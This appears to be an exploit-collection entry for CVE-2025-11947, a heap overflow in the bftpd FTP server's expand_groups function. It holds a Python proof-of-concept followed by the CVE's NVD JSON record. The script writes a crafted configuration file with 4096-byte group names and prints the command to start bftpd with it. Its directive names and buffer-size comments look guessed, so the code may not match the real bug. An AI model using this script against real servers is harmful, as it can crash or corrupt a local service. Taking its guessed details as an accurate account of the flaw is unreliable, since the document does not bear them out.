CVE-2025-11947

#!/usr/bin/env python3 # CVE-2025-11947 - bftpd expand_groups heap-based buffer overflow PoC # This PoC demonstrates triggering the vulnerability by crafting a malicious # configuration file that causes heap buffer overflow in expand_groups() # in options.c of bftpd <= 6.2 import struct import sys def generate_malicious_config(output_path): """ Generate a malicious bftpd configuration file that triggers heap-based buffer overflow in the expand_groups function. The expand_groups function parses group-related directives without proper bounds checking. """ # Normal configuration header config = """# bftpd configuration file # Malicious config to trigger CVE-2025-11947 # Set global options global { user nobody group nogroup daemon off listen on port 21 } """ # Craft an overly long group name to overflow the heap buffer # in expand_groups(). The function allocates a fixed-size buffer # on the heap and copies the group name without length validation. overflow_payload = "A" * 4096 # Exceed typical heap buffer size # Inject the malicious group directive config += f"\nuser_group {overflow_payload}\n" # Add additional overflow triggers for i in range(10): config += f"group_{i} {overflow_payload}\n" with open(output_path, 'w') as f: f.write(config) print(f"[+] Malicious configuration written to {output_path}") print(f"[+] Payload size: {len(overflow_payload)} bytes per entry") def trigger_vuln(config_path): """ Trigger the vulnerability by starting bftpd with the malicious config. In a real attack scenario, this would be placed where bftpd reads it. """ print(f"[*] To trigger: place config at {config_path}") print(f"[*] Then start bftpd or restart the service") print(f"[*] Command: bftpd -d -c {config_path}") if __name__ == "__main__": config_path = sys.argv[1] if len(sys.argv) > 1 else "/tmp/bftpd.conf" generate_malicious_config(config_path) trigger_vuln(config_path)

{"cve": {"id": "CVE-2025-11947", "sourceIdentifier": "[email protected]", "published": "2025-10-19T22:15:37.080", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in bftpd up to 6.2. Impacted is the function expand_groups of the file options.c of the component Configuration File Handler. Executing a manipulation can lead to heap-based buffer overflow. It is possible to launch the attack on the local host. Attacks of this nature are highly complex. The exploitability is considered difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "baseScore": 3.5, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "references": [{"url": "https://shimo.im/docs/rp3OMVMZZXc9lvkm/", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329027", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329027", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.673133", "source": "[email protected]"}]}}